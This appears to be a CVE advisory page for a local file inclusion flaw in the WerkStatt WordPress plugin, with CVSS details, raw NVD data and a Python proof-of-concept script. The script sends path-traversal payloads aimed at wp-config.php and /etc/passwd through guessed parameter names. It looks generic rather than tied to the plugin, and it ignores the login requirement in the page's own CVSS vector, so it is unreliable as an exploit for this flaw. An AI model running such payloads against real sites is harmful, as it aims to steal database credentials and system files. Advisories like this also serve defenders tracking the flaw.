Security Vulnerability Report
中文
CVE-2025-63017 CVSS 7.5 HIGH

CVE-2025-63017

Published: 2026-01-22 17:15:59
Last Modified: 2026-04-15 00:35:42

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in fuelthemes WerkStatt Plugin werkstatt-plugin allows PHP Local File Inclusion.This issue affects WerkStatt Plugin: from n/a through <= 1.6.6.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WerkStatt Plugin <= 1.6.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63017 PoC - WerkStatt Plugin Local File Inclusion # Target: WordPress site with WerkStatt Plugin <= 1.6.6 import requests import sys target = input("Enter target URL (e.g., http://target.com): ").rstrip('/') # Common vulnerable parameter patterns for WerkStatt plugin vulnerable_params = [ 'template', 'page', 'file', 'include', 'view' ] # Sensitive files to test test_files = [ '../../../../wp-config.php', '../../../../../etc/passwd', '../../../../../../etc/passwd', '../wp-config.php', '../wp-includes/functions.php' ] def test_lfi(url, param, payload): try: test_url = f"{url}/?{param}={payload}" response = requests.get(test_url, timeout=10) # Check for sensitive file signatures if 'DB_NAME' in response.text or 'DB_USER' in response.text: print(f"[+] VULNERABLE! Found wp-config.php content") return True if 'root:' in response.text and '/bin/' in response.text: print(f"[+] VULNERABLE! Found /etc/passwd content") return True except requests.RequestException as e: print(f"[-] Error: {e}") return False print("[*] Testing WerkStatt Plugin LFI vulnerability...") for param in vulnerable_params: for payload in test_files: print(f"[*] Testing: {param}={payload}") if test_lfi(target, param, payload): print("[!] Vulnerability confirmed!") break print("[*] Scan complete.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63017", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:59.403", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in fuelthemes WerkStatt Plugin werkstatt-plugin allows PHP Local File Inclusion.This issue affects WerkStatt Plugin: from n/a through <= 1.6.6."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración include/require en un programa PHP ('Inclusión Remota de Ficheros PHP') vulnerabilidad en el plugin WerkStatt de fuelthemes werkstatt-plugin permite la inclusión local de ficheros PHP. Este problema afecta al plugin WerkStatt: desde n/a hasta &lt;= 1.6.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/werkstatt-plugin/vulnerability/wordpress-werkstatt-plugin-plugin-1-6-6-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}